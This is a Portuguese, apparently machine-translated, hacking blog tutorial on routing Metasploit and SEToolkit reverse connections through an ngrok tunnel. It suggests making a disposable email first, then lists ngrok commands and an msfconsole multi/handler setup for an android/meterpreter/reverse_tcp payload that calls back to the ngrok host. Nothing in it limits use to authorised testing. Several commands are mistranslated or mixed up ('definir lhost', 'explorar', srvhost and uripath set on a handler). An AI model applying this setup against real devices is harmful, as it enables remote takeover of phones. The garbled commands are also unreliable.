ANDROID

[ANDROID][bsummary]

FACEBOOK

[FACEBOOK][twocolumns]

NOTÍCIAS

[NOTÍCIAS][bleft]

KALI LINUX

[KALI LINUX][grids]

Como usar Metasploit, SEToolkit sem abrir portas Kali Linux

Como usar Metasploit, SEToolkit sem abrir portas Kali Linux
Pode ser bastante irritante quando você tem acesso limitado a portas em uma rede. Isso pode causar problemas ao acertar, pois você só pode testar o tráfego na mesma rede. A menos que você possa abrir as portas corretas dentro do painel de administração padrão do roteador por qualquer motivo, às vezes, o acesso a painéis de administração é proibido, por exemplo, se você estiver usando um ponto de acesso móvel, outro exemplo de redes corporativas esconder os painéis e alguns roteadores domésticos que reproduzem até mesmo quando o testador tiver acesso à abertura das portas. A menos que eles simplesmente não tivessem tido o tempo de entrar em vigor, o número de roteadores sem fio só permitirá que o administrador abra portas hoje, você aprenderá a rotear suas conexões através de um túnel seguro externo, isso nos permitirá usar várias ferramentas pentestantes como o Metasploit & SEToolkit fora de nossa rede.
  • Antes de tudo, crie um endereço de e-mail descartável usando getnada.com ou um serviço de e-mail descartável similar. getnada
  • Baixe ngrok  No seu navegador, vá para ngrok.com e escolha um download que se adapte à arquitetura da sua CPU. Ngrok é um site que fornece túneis TCP seguros gratuitamente. Uma vez que o download foi completado, extraia o arquivo Zip e depois o cd para ele, por exemplo, "cd ngrok"
    ngrok1
    Download Page For Ngrok vou usar o NGrok 32 Bit neste tutorial se você usar uma CPU moderna de 64 bits e então baixar a versão de 64 bits de Ngrok
  • Instale o seu authtoken (o código de autenticação abaixo é um exemplo de token de autenticação de cópia da conta ngrok.com. Copie o código de autenticação de sua conta no ngrok.com, vamos usar isso para autenticar nosso túnel. Você pode fazer isso indo para a pasta onde ngrok é armazenado e usando. "/ ngrok authtoken yourauthtokenhere" O código de autenticação será salvo. 
    Exemplo Authtoken
    ./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3
    ngrok2
    Screen Shot Mostra Ngrok Auth Code (Esta conta não é usada por HackingVision e foi excluída após este tutorial)
  • Para criar seu primeiro túnel seguro, use o comando abaixo para configurar um túnel na porta 80. Estou usando a porta http 80 para SET use qualquer porta na qual você gostaria que o ngrok passasse.
    ./ngrok http 80
    Screen Shot mostra ngrok executando com sucesso um tunelamento na porta HTTP 80, os nomes de domínio na captura de tela são domínios externos do seu túnel.
  • Abra a interface da Web em http: // localhost: 4040 para inspecionar e reproduzir solicitações em um navegador da Web de sua escolha. Iniciando o Metasploit Primeiro, você precisará iniciar o Ngrok usando os comandos tcp, pois o Metasploit usará uma conexão TCP reversa. Abra um novo terminal e inicie o Metasploit usando o comando abaixo../ngrok tcp 4444
    msfconsole
    Use seu host local para configurar o srvhost e o lhost.
    definir lhost 0.0.0.0
    set lport 4444
    definir uripath /
    Use a porta que você usou para configurar o ngrok como srvport, isso nos ajudará a fazer um tunelamento de uma sessão Metasploit ou SEToolkit através da Internet.
    Neste tutorial, eu configurarei um manipulador usando as configurações acima para Ngrok. Muitos lendo este guia podem estar usando explorações diferentes completas para minimizar a confusão, estaremos mostrando que você configurou um conversor reverso de Metapreter TCP. Isso ajudará mais tarde ao configurar túneis com outras ferramentas pentesting que usam conexões reversas.
    msfconsole
      msf> use multi / handler 
     msf exploit (manipulador)> set payload android / meterpreter / reverse_tcp 
     msf exploit (manipulador)> set LHOST 0.0.0.0
      msf exploit (manipulador)> set srvhost 0.0.0.0 
     msf exploit (manipulador)> set srvport 4444 
     msf exploit (manipulador)> set uripath / 
     msf exploit (manipulador)> explorar
    Quando a sua criação de Cargas úteis para Metasploit, você precisará incluir seu túnel e também a porta que você usa para o Ngrok.
    Ao criar as cargas úteis, use o domínio fornecido pela Ngrok ou você pode executar ping no domínio para receber e IP e usar o endereço IP a partir dos resultados, use a mesma porta para a carga como seu ouvinte.
    Exemplo SEToolkit
    setoolkit
    Screen Shot Below Mostra SEToolkit configurado para usar host externo.
    Isso funcionará como um túnel para muitas ferramentas mais pentestantes, este tutorial não se limita apenas a Metasploit e SEToolkit. Considere compartilhar este tutorial nas mídias sociais e, com seus amigos, agradecer pelo apoio ao HackingVision , listados alguns links abaixo para ajudá-lo a criar seus túneis TCP e cargas úteis.
0 comentários via Blogger
comentários via Facebook

Nenhum comentário :